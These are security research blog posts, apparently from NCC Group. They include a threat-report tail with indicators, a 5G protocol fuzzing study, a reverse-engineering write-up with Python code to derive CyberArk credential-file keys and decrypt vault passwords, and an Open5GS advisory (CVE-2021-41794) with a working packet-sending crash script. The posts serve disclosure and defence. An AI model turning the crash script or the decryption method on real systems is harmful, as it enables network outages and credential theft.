MITRE ATT&CK mapping

Tactic | Technique | Procedure
Reconnaissance | T1595.002 – Vulnerability Scanning | SnapMC used the Acunetix vulnerability scanner to find systems running vulnerable Telerik software.
Initial Access | T1190 – Exploit Public Facing Application(s) | SnapMC exploited CVE-2019-18935 and SQL injection.
Privilege Escalation | – | SnapMC used a combination of PowerShell cmdlets to achieve privilege escalation.
Execution | T1059.001 – PowerShell | SnapMC used a combination of publicly available PowerShell cmdlets.
Collection | T1560.001 – Archive via Utility | SnapMC used 7zip to prepare data for exfiltration.
Exfiltration | T1567 – Exfiltration over Web Service / T1567.002 – Exfiltration to Cloud Storage | SnapMC used the MinIO client (mc.exe) to exfiltrate data.

Indicators of Compromise

Type | Data | Notes
File location + file name | C:\Windows\Temp\[0-9]{10}.[0-9]{1,8}.dll (example: c:\Windows\Temp\1628862598.87034184.dll) | File name of dropped payload after successful Telerik exploitation; the first part is the epoch timestamp and the last part is randomly generated
File location + file name | C:\Windows\Temp\7za.exe | 7zip archiving utility
File name | s.ps1 | SQL cmdlet
File name | a.ps1 | SQL cmdlet
File name | x.ps1 | SQL cmdlet
File name | *.par.minio | Temporary files created by MinIO during exfiltration
File location | C:\Windows\Temp\Azure\ | Folder for temporary files created by MinIO
File location | C:\Windows\Temp\Vmware\ | Folder for temporary files created by MinIO
File name | mc.exe | MinIO client
Hash | 651ed548d2e04881d0ff24f789767c0e | MD5 hash of MinIO client
Hash | b4171d48df233978f8cf58081b8ad9dc51a6097f | SHA1 hash of MinIO client
Hash | 0a1d16e528dc1e41f01eb7c643de0dfb4e5c4a67450c4da78427a8906c70ef3e | SHA256 hash of MinIO client

References

[1] – https://nvd.nist.gov/vuln/detail/CVE-2019-18935

[2] – https://github.com/noperator/CVE-2019-18935

[3] – https://github.com/calebstewart/CVE-2021-1675

[4] – https://github.com/d0nkeys/redteam/tree/master/privilege-escalation

[5] – https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-ServiceAbuse/

[6] – https://github.com/gushmazuko/WinBypass

[7] – https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-PrivescAudit/

[8] – https://min.io/

The Challenges of Fuzzing 5G Protocols

11 October 2021 at 17:30

If you have ever looked at fuzzing in any depth you will quickly realize it’s not as trivial as it first appears.

There are many different types of fuzzers, but here we are focused on network fuzzers.  These fuzzers are of particular interest as they are most suited to fuzzing telecoms products/protocols, where the application and source code are generally not available.  There are very few fuzzer options when the input to these applications is via network sockets instead of the more traditional command line interface.

In this blog we will cover some basic background of fuzzing, before diving into the specifics of trying to fuzz telecoms 5G protocols using both proprietary and open source fuzzers.  We will aim to assess these fuzzers for their suitability to fuzz 5G network protocols.  We will end this post with a comparison of the fuzzers, some of the findings, and a general conclusion regarding the fuzzing of 5G telecoms protocols.

The focus of this research is on the use of the different fuzzers with regard to 5G telecoms protocols and not the specific vulnerabilities that were found, although one example vulnerability found is cited within.

Background

So, what is fuzzing?  Fuzzing is simply an automated process of sending invalid or random inputs to a program/system under test in an attempt to cause a crash or malfunction.

Fuzzing is not a new technology, however it is becoming more prominent in today’s software development life cycle. It is often used to find vulnerabilities in software that might otherwise be missed by normal unit/system tests. 

While the high-level concept of fuzzing is easy to grasp, the actual implementation of a good fuzzer is significantly more challenging.

The renewed interest in fuzzing has come about due to the increasing complexity of software and the need to effectively test and secure it.  While positive testing is generally more obvious (i.e. testing that the software does what it was designed to do), negative testing is normally forgotten about (testing that the software handles unexpected input without crashing or malfunctioning).

Traditional fuzzers tend to focus on fuzzing a piece of software and generate inputs via the command line or input files.  Some popular continuous integration frameworks (e.g. GitLab) are now starting to include fuzzing as part of the continuous integration build pipeline.

Fuzzing network protocols is a little different however, and requires sending input via network ports.  There are typically multiple network protocols involved in any communication and these protocols are layered on top of each other.  Some protocols are stateless, and others have state which adds to the complexity.  Due to the nature of network protocols the System Under Test (SUT) could be either local (on the same physical/virtual machine) or on a remote physical/virtual machine.  These differences add to the challenge of fuzzing a SUT using network protocols.

The next difficulty specific to fuzzing 5G protocols is getting access to a 5G Core or component.  There are two open-source solutions Free5GC and Open5GS which were examined for our testing.  Open5GS was chosen due to it being more stable and easier to install than Free5GC.  Neither of these solutions are commercial grade but they do give a reasonable test target to fuzz for free.

We also need some network fuzzers…

Meet the Fuzzers

One in-house and two open-source network protocol fuzzers were used for testing: Fuzzowski 5GC, Frizzer [2], and AFLNet [3].  They all have completely different approaches to fuzzing, from the generation of test cases to the feedback on progress made.

Fuzzowski [1] was chosen as it had previously been used to fuzz network printer protocols and was developed by NCC Group from the open-source project BooFuzz [4].  Fuzzowski is open source; however, the modified version used here for fuzzing 5G is not currently an open-source project.

Frizzer is a black box fuzzer that uses dynamic binary instrumentation to give coverage feedback to guide the fuzzer.  No source code or recompilation of the SUT is needed.

AFLNet was used as a comparison due to the reputation of AFL being a well-used fuzzer with proven results.  AFLNet builds on top of AFL to perform network fuzzing and track state changes using the network responses.

Fuzzowski 5GC

Fuzzowski 5GC is a template based mutational/generational fuzzer.  This simply means that the format of the input is specified, and the values defined within the format are mutated using selected algorithms depending upon the data type.

Fuzzowski 5GC can fuzz sequences of messages however it has no concept of state.  As Fuzzowski 5GC is aware of the data structure being fuzzed, it can fix checksums and length fields which helps avoid early parsing errors that would prevent testing of deeper parts of the protocol stack.
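
To illustrate why this matters, the toy function below shows the kind of post-mutation fixup a template-aware fuzzer can perform; the packet layout (2-byte length, payload, trailing CRC32) is hypothetical. Without recomputing these fields, most mutated packets would be rejected by the first parsing layer and never exercise deeper code:

import struct
import zlib

def fix_length_and_crc(msg: bytes) -> bytes:
    # Hypothetical layout: 2-byte big-endian length | payload | 4-byte CRC32.
    payload = msg[2:-4]
    header = struct.pack('>H', len(payload))
    crc = struct.pack('>I', zlib.crc32(header + payload))
    return header + payload + crc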

Fuzzowski 5GC is a black box fuzzer meaning it has no knowledge of the SUT other than the network API.

Frizzer

Frizzer is a black box, coverage-guided, mutation-based fuzzer.  It uses example input and randomly mutates it using Radamsa [7].  It uses Frida [6] to dynamically instrument the SUT to provide code coverage feedback.

AFLNet

AFLNet is a guided, mutation-based fuzzer.  It uses example input and randomly mutates parts of the input based on different mutation algorithms.  It has no knowledge of the input data format and uses state feedback from the network messaging to guide the fuzzing process.

AFLNet is a grey box fuzzer as it uses source code instrumentation to generate the code coverage feedback.

The Test Environment

For testing the fuzzers, an Ubuntu environment running Open5GS [5] was used.

Open5GS is an open-source implementation of a 5G Core and EPC written in the C language.  Open5GS was chosen to emulate the 5G core as it is freely available and actively maintained.  Because it is not a commercial product and is written in C, it makes an ideal target for fuzzing, as it is unlikely to be as thoroughly tested.  It is also more likely to be focused primarily on functionality rather than security.

As the protocol specifications are the same for both open source and commercial products, the network message formats should be representative of a real 5G Core network. We chose to limit the scope of testing to look at the NGAP, GTPU, PFCP, and DIAMETER protocols, which we will explain briefly below.

All the fuzzers were tested against the AMF component of the Open5GS software to fuzz the more complex NGAP protocol. The theory being that as one of the more complex 5G protocols, it has a higher probability of bugs – however, it is also more difficult to fuzz as a result of its complexity.

Fuzzowski 5GC was also tested against other 5G components to fuzz the GTPU, PFCP and DIAMETER protocols.

Finding vulnerabilities in these protocols and their implementation can lead to various types of attack scenarios such as denial of service, privilege escalation, remote code execution, user information disclosure and capture.

GTPU

GPRS Tunneling User Data Protocol (GTPU) is effectively a relatively simple IP based tunnelling protocol, which can have many tunnels between each set of end points.  It is used to tunnel user plane data between different network nodes.  In our testing this is the N3 interface between gNB and UPF.

PFCP

Packet Forwarding Control Protocol (PFCP) facilitates the establishment, modification, and deletion of Sx sessions within the user plane function.  PFCP rules which are passed from the control plane function to the user plane function include things like Packet Detection Rule (PDR), QoS Enforcement Rule (QER), Buffering Action Rule (BAR) etc.  In our testing this is the N4 interface between the UPF and SMF.

DIAMETER

DIAMETER is an application-layer authentication, authorization and accounting (AAA) protocol.  The base protocol can be extended by adding new commands and/or attributes.  In our testing this is the S6a interface between the MME and HSS.  The DIAMETER S6a interface allows for the exchange of mobile-device location information and subscriber management information between the MME and HSS.

NGAP

Next Generation Application Protocol (NGAP) supports both UE and non-UE associated services.  It includes operations such as configuration updates, UE context transfer, PDU session resource management and also support for mobility procedures.  In our testing this is the N2 interface between the AMF and gNB.

Fuzzing Results

Fuzzowski 5GC found several issues with GTPU, PFCP and DIAMETER but failed to find anything for the NGAP protocol.

Frizzer and AFLNet were only run against a subset of the 5G protocols and found some issues which at time of writing are under further investigation and, as appropriate, coordinated disclosure.

The types of crashes that can be observed in these targets could cause loss of service for subscribers of the network, preventing them from connecting to the network (denial of service), or potentially other security implications if stack/heap corruptions can be exploited to execute code or gain privileged access.

The following is an example crash caused while fuzzing the GTPU/PFCP protocols using Fuzzowski 5GC. This bug has now been patched as of October 6th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).

In the next section, we’ll discuss this bug in more depth, but also share the associated Technical Advisory and CVE details below:

PFCP Bug (CVE-2021-41794)

This shows a stack corruption caused by the function ‘ogs_fqdn_parse’ writing beyond the end of the ‘dnn’ character buffer which is defined on the stack as 100 characters (OGS_MAX_DNN_LEN = 100). If ‘message->pdi.network_instance.data’ contains the value ‘internet’ for example, it causes stack corruption to occur.

There are a few issues with the function ‘ogs_fqdn_parse’. The first is the calculation of the variable ‘len’, which is set to the value of the first character of the ‘src’ parameter. In this example it is the lowercase letter ‘i’, which equates to the numerical value 105. The length of the ‘src’ parameter is 8; however, this is not checked until it is too late. The memcpy reads past the end of the ‘src’ parameter and also writes beyond the end of the ‘dst’ parameter (which is actually the variable ‘dnn’ on the stack).

As the ‘src’ parameter is ultimately coming from the PFCP Session Establishment Request it could be manipulated to contain any value and the length controlled by setting the first byte.
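
The Python sketch below illustrates the flawed parsing pattern described above (a simplified rendering of the logic, not the actual Open5GS source; in the real C code the unchecked length feeds a memcpy):

def fqdn_parse(src: bytes) -> bytes:
    # FQDNs are encoded as length-prefixed labels. If src is a plain string
    # such as b'internet', the first byte 'i' (0x69 = 105) is interpreted as
    # a label length, far beyond the 8 bytes actually available.
    labels = []
    i = 0
    while i < len(src):
        length = src[i]                  # never validated against len(src)
        i += 1
        labels.append(src[i:i+length])   # in C: an unchecked memcpy of `length` bytes
        i += length
    return b'.'.join(labels)

print(fqdn_parse(b'internet'))   # tries to consume 105 bytes' worth of input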

Comparative Performance of the Selected Fuzzers

Fuzzowski 5G

Fuzzowski 5GC proved to be good at finding bugs in stateless protocols; however, various modifications were made to Fuzzowski 5GC in an attempt to fuzz the NGAP protocol.

The biggest issue with using Fuzzowski 5GC is that it needs the structure of the messages to be defined.  Creating message definitions, sequences, and functionality to handle message sequences is a slow and manual process.  The messages are generally created from Wireshark captures and therefore tend not to cover all parts of the protocol specification (e.g., optional elements).

Frizzer

Frizzer was easy to setup as the source code was available for the SUT.  If there had been no source code, some reverse engineering would be required to find the function/address of the network processing section of the application.

The SCTP protocol was added to Frizzer so that it could connect to the AMF.  It was also modified to keep the SCTP connection open between tests as the AMF would fail otherwise.

As Frizzer uses Frida [6] to dynamically instrument the binary, there is no need for special compilation of the application, as required with AFLNet.

Frizzer has the same issues as AFLNet regarding checksums, although it may be possible to use Frida [6] to dynamically change the execution path of the SUT and force checksum calculations to pass.
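
As a sketch of that idea (the process name and checksum-routine address are placeholders), a Frida script attached from Python could force a checksum verification routine to always report success:

import frida

# Process name and checksum-routine address are assumptions for illustration.
session = frida.attach("open5gs-amfd")
script = session.create_script("""
Interceptor.attach(ptr('0x55e0c0de1234'), {   // hypothetical checksum routine
    onLeave: function (retval) {
        retval.replace(0x1);                  // force 'checksum valid'
    }
});
""")
script.load()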

Frizzer testing was limited: without fixing a bug in the AMF, testing kept stopping after a few hundred test cases.

AFLNet

AFLNet required a reasonable amount of work to set up.  The program defaults were not suitable for our testing purposes, so they were overridden on the command line.  SCTP was added to the supported connection types so that the SCTP transport itself would not be fuzzed.

For AFLNet to function, the SUT needs to be compiled with instrumentation.  To compile the AMF application, the build process for Open5GS was modified to instrument the code.  Because AFLNet initializes the AMF application for every test, the process of fuzzing was very slow compared to the other fuzzers.

Because of the slow speed of fuzzing, minimal time and effort was spent to enable fuzzing of a single NGAP message.  The mutational nature of AFLNet means it would not be very effective at dealing with length and checksum parameters, making it difficult for it to explore the deeper parts of the protocol.

What We Learnt by Fuzzing 5G Protocols

This research shows that fuzzing 5G telecoms protocols is not as straightforward as downloading your favorite open source fuzzer and hitting go!  Sure, they might find a few bugs in the simple stateless protocols, but they fail to find those deeper, harder to reach issues. Fuzzing 5G protocols introduces specific challenges, such as the need for binary instrumentation of commercial 5G components for which source code is unavailable.

A good starting point for any telecoms fuzzer would be to create input from the ASN1 definitions of the protocols. This would make it easier to create test cases for specific versions of protocols, and give better coverage of the protocol compared to manually defining the input.  It would also be quicker and a lot less error prone to produce the test cases.  This approach would require writing an ASN1 parser which could generate suitable output for use with the fuzzer (a reasonable challenge in itself).
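
As a sketch of the idea, assuming an ASN.1 toolkit such as asn1tools and using a toy grammar in place of the actual 3GPP NGAP definitions, structurally valid test cases can be generated directly from the schema and then selectively mutated:

import asn1tools

# Toy ASN.1 module standing in for the real 3GPP NGAP definitions.
SPEC = '''
Toy DEFINITIONS ::= BEGIN
    Message ::= SEQUENCE {
        procedureCode INTEGER (0..255),
        payload OCTET STRING
    }
END
'''

spec = asn1tools.compile_string(SPEC, codec='per')

for code in range(256):
    # Every packet is structurally valid, so it passes the first parsing
    # layer; fuzzing effort is spent on the field values instead.
    packet = spec.encode('Message', {'procedureCode': code, 'payload': b'AAAA'})
    # send packet over SCTP to the SUT here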

It is unlikely that source code would be available when testing a commercial 5G component.  For this reason, binary instrumentation would greatly help in guiding a fuzzer.  It is possible to use tools like Frida [6] to instrument the SUT to give coverage feedback similar to AFL.

Monitoring for crashes is more challenging as the SUT may be on a remote server.  A monitoring application would need to run on the same server as the SUT to feed status information back to the fuzzer.  As Frida [6] runs in the target process, it could be used for monitoring as well as providing other feedback.

Another issue encountered is unexpected messages.  Some 5G protocols (e.g., NGAP) repeatedly send requests at timed intervals if an invalid response is received.  This causes problems for fuzzers like Fuzzowski 5GC which has a predefined message sequence.  Issues such as this render Fuzzowski 5GC less effective when testing a real system (these messages were disabled during our testing for the open-source products).

There are very few companies offering network fuzzers for 5G protocols, and it is easy to see why.  Some fuzzers are more costly and require long testing cycles with complex configuration.  All this extra time and complexity eats into any development cycle, especially if deadlines are tight.  Outsourcing security testing, particularly if a business is not resourced to conduct assessments to certain levels of accreditation, is key to easing this burden.

The Catalogue of General Security Assurance Requirements (3GPP TS 33.117 version 16.5.0 Release 16) contains a section on Robustness and Fuzz Testing with more and more operators, regulators and accreditation bodies requiring thorough fuzzing and testing of 5G components in the coming years.  To satisfy these requirements, it is clear a combination of fuzzing tools and techniques are required.

Fuzzowski 5G Modifications

A lot of work has been put into improving Fuzzowski to create our proprietary version for 5G protocols, Fuzzowski 5GC.  The following is a high-level list of functionality/fixes that have been added to the publicly available Fuzzowski [1]:

  • Global/Local JSON configuration files
  • Variables for requests
  • Groups to fuzz sections of a request with a set of specific values
  • Setup/Teardown for each testcase (used in GTPU fuzzer to setup GTP tunnel)
  • SCTP connections
  • HTML documentation
  • Render option to output byte stream for a request to help with debug
  • Help option to display all available options
  • Added receive strategy
  • Added more test cases to validate functionality
  • Protocols added: GTPU, PFCP, DIAMETER, SIP, NGAP/NAS
  • Lots of bug fixes and code improvements

Glossary

Term | Description
SUT | System Under Test
AMF | Access and Mobility Management Function
UPF | User Plane Function
Fuzzer | Software that generates invalid input for testing applications
Coverage Guided | Source code is instrumented to give source code coverage metrics to help guide the fuzzer to generate data that uncovers new execution paths within the source code.
Generational Template Fuzzing | Uses a predefined template to specify the structure of the data and then generates invalid data using an algorithm.
MME | Mobility Management Entity
HSS | Home Subscriber Server
gNB | New Radio Node B
ASN1 | Abstract Syntax Notation One (ASN.1)

References

[1] GitHub – nccgroup/fuzzowski: the Network Protocol Fuzzer that we will want to use.

[2] GitHub – demantz/frizzer: Frida-based general purpose fuzzer

[3] GitHub – aflnet/aflnet: AFLNet: A Greybox Fuzzer for Network Protocols

[4] GitHub – jtpereyda/boofuzz: A fork and successor of the Sulley Fuzzing Framework

[5] GitHub – open5gs/open5gs: Open5GS is an Open Source implementation for 5G Core and EPC

[6] Frida – A world-class dynamic instrumentation framework

[7] GitLab – Aki Helin / radamsa

How To Work with Us on Commercial Telecommunications Security Testing

NCC Group has performed cybersecurity audits of telecommunications equipment for both small and large enterprises. We have experts in the telecommunications field and work with worldwide operators and vendors on securing their networks. NCC Group regularly undertakes assessments of 3G/4G/5G networks as well as providing detailed threat assessments for clients. We have the consultant base to look in detail at the security threats to your extended enterprise equipment, a mobile messaging platform, or a vendor’s hardware. We work closely with all vendors and have extensive knowledge of each major vendor’s equipment.

NCC Group is at the forefront of 5G security working with network equipment manufacturers and operators alike. We have the skills and capability to secure your mobile network and provide unique insights into vulnerabilities and exploit vectors used by various attackers. Most recently, we placed first in the 5G Cyber Security Hack 2021 Ericsson challenge in Finland.

NCC Group can offer proactive advice, security assurance, incident response services and consultancy services to help meet your security needs.

If you are an existing customer, please contact your account manager, otherwise please get in touch with our sales team.

Reverse engineering and decrypting CyberArk vault credential files

8 October 2021 at 08:00

Author: Jelle Vergeer

This blog will be a technical deep-dive into CyberArk credential files and how the credentials stored in these files are encrypted and decrypted. I discovered it was possible to reverse engineer the encryption and key generation algorithms and decrypt the encrypted vault password. I also provide a python implementation to decrypt the contents of the files.

Introduction

It was a bit more than a year ago that we did a penetration test for a customer where we came across CyberArk. During this penetration test we assessed the customer’s AD tiering model, which they had implemented using CyberArk. We were able to get access to the CyberArk Privileged Session Manager (PSM) server, where we found several .cred CyberArk-related files. At the time of the assignment I suspected the files were related to accessing the CyberArk Vault, the component that stores all passwords used by CyberArk. The software seemed to be able to access the vault using the files, with no additional user input necessary. These credential files contain several fields, including an encrypted password and an “AdditionalInformation” field. I immediately suspected I could reverse or break the crypto to recover the password, though the binaries were quite large and complex (C++ classes everywhere).

A few months later, during another assignment for another customer, we again found CyberArk-related credential files, but again, nobody knew how to decrypt them. So during a boring COVID stay-at-home holiday I dove into the CreateCredFile.exe binary, used to create new credential files, and started reverse engineering the logic. Creating a dummy credential file using the CreateCredFile utility looks like the following:

[Image: Creating a new credential file with CreateCredFile.exe]

[Image: The created test.cred credential file]

The encryption and key generation algorithms

It appears there are several types of credential files (Password, Token, PKI, Proxy and KeyPair). For this exercise we will look at the password type. The details in the file can be encrypted using several algorithms:

  • DPAPI protected machine storage
  • DPAPI protected user storage
  • Custom

The default seemed to be the custom one, and after some effort I started to understand the logic of how the software encrypts and decrypts the password in the file. The encryption algorithm is roughly the following:

First the software generates 20 random bytes and converts this to a hexadecimal string. This string is stored in the internal CCAGCredFile object for later use. This basically is the “AdditionalInformation” field in the credential files. When the software actually enters the routine to encrypt the password, it will generate a string that will be used to generate the final AES key. I will refer to this string as the base key. This string will consist of the following parts, appended together:

  • The Application Type restriction, converted to lower case, hashed with SHA1 and base64 encoded.
  • The Executable Path restriction, converted to lower case.
  • The Machine IP restriction.
  • The Machine Hostname restriction, converted to lower case.
  • The OS Username restriction, converted to lower case.
  • The 20 random bytes, or AdditionalInformation field.
[Image: An example base string that will be used to generate the AES key]

Note that by default, the software will not apply the additional restrictions, only relying on the additional info field present in the credential files. After the base key is generated, the software will generate the actual encryption key used for encrypting and decrypting credentials in the credential files. It will start by creating a SHA1 context, and update the context with the base key. Next it will create two copies of the context. The first context is updated with the integer ‘1’, and the second is updated with the integer ‘2’, both in big endian format. The finalized digest of the first context serves as the first part of the key, followed by the first 12 bytes of the finalized second digest. The AES key is thus 32 bytes long.
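
Putting those steps together, a minimal sketch of the key derivation in Python (function names are ours, and the integer updates are assumed to be 4-byte big-endian values as described above):

import base64
import hashlib
import struct

def build_base_key(additional_info, app_type='', exe_path='', machine_ip='',
                   hostname='', os_user=''):
    # By default only the AdditionalInformation field is populated.
    parts = [
        base64.b64encode(hashlib.sha1(app_type.lower().encode()).digest()).decode() if app_type else '',
        exe_path.lower(),
        machine_ip,
        hostname.lower(),
        os_user.lower(),
        additional_info,
    ]
    return ''.join(parts).encode()

def derive_aes_key(base_key):
    ctx = hashlib.sha1(base_key)
    ctx1, ctx2 = ctx.copy(), ctx.copy()
    ctx1.update(struct.pack('>I', 1))            # big-endian integer '1'
    ctx2.update(struct.pack('>I', 2))            # big-endian integer '2'
    return ctx1.digest() + ctx2.digest()[:12]    # 20 + 12 = 32-byte AES key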

When encrypting a value, the software generates some random bytes to use as an initialization vector (IV), and stores the IV in the first block of encrypted bytes. Furthermore, when a value is encrypted, the software will encrypt the value itself combined with the hash of the value. I assume this is done to verify the decryption routine was successful and the data is not corrupted.
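
Decryption of a stored field would then look roughly as follows; AES-CBC is an assumption consistent with the IV-in-the-first-block behavior described above (pycryptodome):

from Crypto.Cipher import AES  # pycryptodome

def decrypt_field(aes_key, blob):
    # The first 16-byte block carries the IV; the remainder is the encrypted
    # value concatenated with its hash (used as an integrity check).
    iv, ciphertext = blob[:16], blob[16:]
    return AES.new(aes_key, AES.MODE_CBC, iv).decrypt(ciphertext)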

Decrypting credential files

Because, by default, the software will only rely on the random bytes as base key, which are included in the credential file, we can generate the correct AES key to decrypt the encrypted contents in the file. I implemented a Python utility to decrypt CyberArk credential files and it can be downloaded here. The additional verification attributes the software can include in the base key can be provided as command line arguments to the decryption tool. Most of these can be either guessed or easily discovered, as an attacker will most likely already have a foothold in the network, so a hostname or IP address is easily uncovered. In some cases the software even stores these verification attributes in the file, since the CreateCredFile.exe utility asks whether to include the restrictions when creating a credential file.

[Image: Decrypting a credential file using the decryption tool.]

Defense

How can you defend against attackers decrypting the CyberArk vault password in these credential files? First off, prevent an attacker from gaining access to the credential files in the first place. Protect your credential files and don’t leave them accessible by users or systems that don’t need access to them. Second, when creating credential files using the CreateCredFile utility, prefer the “Use Operating System Protected Storage for credentials file secret” option to protect the credentials with an additional (DPAPI) encryption layer. If this encryption is applied, an attacker will need access to the system on which the credential file was generated in order to decrypt the credential file.

Responsible Disclosure

We reported this issue at CyberArk and they released a new version mitigating the decryption of the credential file by changing the crypto implementation and making the DPAPI option the default. We did not have access to the new version to verify these changes.

Timeline:

20-06-2021 – Reported issue at CyberArk.
21/23/27/28-06-2021 – Communication back and forth with questions and explanation.
29-06-2021 – Call with CyberArk. They released a new version which should mitigate the issue.

Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF (CVE-2021-41794)

6 October 2021 at 15:07
Vendor: Open5GS
Vendor URL: https://github.com/open5gs/open5gs
Versions affected: 1.0.0 to 2.3.3
Systems Affected: Linux
Author: mark.tedman[at]nccgroup[dot]com
Advisory URL / CVE Identifier: CVE-2021-41794
Risk: CVSSv3.1: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)

Summary

When connecting to the UPF port for the PFCP protocol (8805) and sending an Association Setup Request followed by a Session Establishment Request with a PDI Network Instance set to ‘internet’, it causes a stack corruption to occur.

Impact

Exploitation of this vulnerability would lead to denial of service for the subscriber’s equipment.

Details

Sending a PFCP Association Setup followed by a PFCP Session Establishment Request with the settings detailed below is enough to cause the stack overflow.  The issue is caused by the function ogs_fqdn_parse in the file lib/core/ogs-3gpp-types.c calculating a length value used in a memcpy without validating it.

Directly affected files:

  • Function: ogs_fqdn_parse in /lib/core/ogs-3gpp-types.c
  • /lib/nas/5gs/ies.c
  • /lib/nas/eps/ies.c
  • /lib/pfcp/handler.c
  • /lib/pfcp/types.c
  • /lib/sbi/nnrf-handler.c
  • /src/mme/sgsap-handler.c
  • /src/sgwc/s11-handler.c
  • /src/smf/context.c

The following Python script can be used to replicate the issue:

#!/usr/bin/env python3

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(1.0)

pfcp_association_setup_req = b'\x20\x05\x00\x1a\x00\x00\x01\x00\x00\x3c\x00\x05\x00\xc0\xa8\x3f\x88\x00\x60\x00\x04\x5f\xf4\x38\x25\x00\x59\x00\x01\x00'

pfcp_session_establishment_req = b'\x21\x32\x00\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x3c\x00\x05\x00\xc0\xa8\x3f\x88\x00\x39\x00\x0d\x5a\x00\x00\x00\x00\x00\x00\x00\x01\xc0\xa8\x3f\x88\x00\x01\x00\x46\x00\x38\x00\x02\x00\x01\x00\x1d\x00\x04\x1f\x00\x00\x00\x00\x02\x00\x27\x00\x14\x00\x01\x00\x00\x15\x00\x09\x01\x00\x00\x00\x0a\xc0\xa8\x3f\x88\x00\x16\x00\x08\x69\x6e\x74\x65\x72\x6e\x65\x74\x00\x5d\x00\x05\x02\x2d\x2d\x00\x02\x00\x5f\x00\x01\x00\x00\x6c\x00\x04\x00\x00\x00\x01\x00\x01\x00\x34\x00\x38\x00\x02\x00\x02\x00\x1d\x00\x04\x1f\x00\x00\x00\x00\x02\x00\x1a\x00\x14\x00\x01\x01\x00\x16\x00\x08\x69\x6e\x74\x65\x72\x6e\x65\x74\x00\x5d\x00\x05\x06\x2d\x2d\x00\x02\x00\x6c\x00\x04\x00\x00\x00\x02\x00\x03\x00\x16\x00\x6c\x00\x04\x00\x00\x00\x01\x00\x2c\x00\x01\x02\x00\x04\x00\x05\x00\x2a\x00\x01\x01\x00\x03\x00\x24\x00\x6c\x00\x04\x00\x00\x00\x02\x00\x2c\x00\x01\x02\x00\x04\x00\x13\x00\x2a\x00\x01\x00\x00\x54\x00\x0a\x01\x00\x00\x00\x00\x0a\xc0\xa8\x3f\x88\x00\x71\x00\x01\x01'

sock.sendto(pfcp_association_setup_req, ('127.0.0.7', 8805))
try:
   sock.recv(65535)
except Exception as ex:
   print(f"Receive failed: {ex}")

sock.sendto(pfcp_session_establishment_req, ('127.0.0.7', 8805))
try:
   sock.recv(65535)
except Exception as ex:
   print(f"Receive failed: {ex}")

sock.close()

Recommendation

The function ogs_fqdn_parse needs to correctly calculate/validate the length used in the memcpy function.  This has been patched as of October 6th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).

Users should update to the most recent version 2.3.4 or above of Open5GS.

Vendor Communication

29/09/2021: Initial email sent to Open5GS
29/09/2021: Open5GS replied with PGP Key
30/09/2021: Sent Technical Advisory to Open5GS
30/09/2021: Technical Advisory received by Open5GS
01/10/2021: Bug fixed by Open5GS
06/10/2021: Open5GS version 2.3.4 released - fixes bug

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  06/10/2021

Written by:  Mark Tedman

Assessing the security and privacy of Vaccine Passports

4 October 2021 at 20:05

There has been a lot of development lately in the field of health credentials, especially in the field of vaccine credentials. This has largely been driven by a perceived need to track and validate an individual’s vaccination status with respect to COVID-19.

This post attempts to explore the security and privacy concerns related with vaccine credential systems, by way of threat modelling and exploring the various risks and attacks conceivable against such systems. There are other concerns about these systems apart from security and privacy, mainly in the social and political realm; those issues are best left discussed by others, and we’ll restrict treatment to technical topics and attacks here. Furthermore, we’ll look at these concerns through the lens of the users of the system, rather than the maintainers of such systems – i.e from the perspective of end users looking to prove their vaccination status, and businesses or entities looking to validate said credentials. Essentially, just the public-facing parts of the system.

General overview

There are many vaccine credential systems (VCS) currently in use around the world. Many share a common base format for their credentials (such as CommonPass), while others have gone their own way in defining what a vaccine credential is. Quite a few of these initiatives are planning to go beyond the immediate need for COVID-19 vaccination tracking, branding themselves as a “smart health card” (like https://smarthealth.cards/) encompassing a broader range of health and vaccination information.

For the purposes of this exercise, we assume a simple vaccine credential system with a few defined entities. These entities include:

  • End-user: The individual trying to acquire a vaccine credential (VaxCred), which proves their COVID-19 vaccination or test status
  • Vaccination lab (VaxLab): The entity or organization that performs COVID-19 vaccination and/or SARS-CoV-2 tests and stores the result in a health backend
  • Health backend: A system that stores vaccination and test results from vaccination labs, and makes them available to the health site.
  • Health site/mobile app (HealthSite or HealthApp): The user-facing website or mobile application an end-user uses to acquire, and possibly store and display, a vaccine credential from the health backend
  • Scanner app (ScannerApp): An application that businesses or entities use to validate a vaccine credential

A generalized flow of such systems usually proceeds in the following manner:

  • End-user approaches a Vaccination lab, proves their identity to the vaccination lab, and acquires a vaccination/test
  • VaxLab communicates/stores result to health backend
  • End-user authenticates to HeathApp and acquires a VaxCred
  • End-user presents VaxCred to an entity (such as an event venue or restaurant) requiring proof of vaccination, who uses a ScannerApp to validate authenticity of their vaccine credential
  • End-user gains access to venue/physical event space on successful validation of their vaccine credential

We assume that the vaccination lab, health backend and HealthApp trust each other, can communicate securely, and store user identity and vaccination status securely. In practice, there may be many discrete labs or organizations communicating vaccine administration information to a public health authority or health backend. Since these interfaces are not generally publicly exposed, we omit discussions about securing these systems in this post.

Understanding Potential Security Threats

We break down possible security threats and concerns by phases of the interaction, namely identifying the vaccine credential system, vaccine credential acquisition, and finally, usage of the vaccine credential to prove vaccination status.

Phase 1: Identifying and trusting a vaccine credential

So far, there is no singular, standard vaccine credential system commonly used or accepted globally, and their use and acceptance varies widely across geographies and purposes. For instance, the NYS Excelsior Pass is used in New York State, whereas EU’s Digital Green certificate is more in use in the European Union. Non-government systems like IATA’s Travel Pass are used by member airlines for certain flight segments. The selection of which vaccine credential system (VCS) to use is largely dependent on the requirements of the particular activity a user wishes to engage in, and generally isn’t a choice for the user. This means an individual might have to be simultaneously enrolled in multiple VCS and have different vaccine credentials to satisfy the requirements of different entities.

